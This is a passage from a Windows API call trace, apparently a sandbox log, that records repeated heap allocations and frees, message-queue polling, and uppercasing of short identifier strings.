lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0260.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.170] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.171] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0260.171] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.171] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.173] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.173] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.174] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0260.174] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0260.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0260.175] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0260.175] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0260.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0260.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0260.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0260.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0260.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0260.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0260.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0260.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.184] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0260.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.184] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.184] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0260.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.186] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.187] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.188] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.189] RtlAllocateHeap 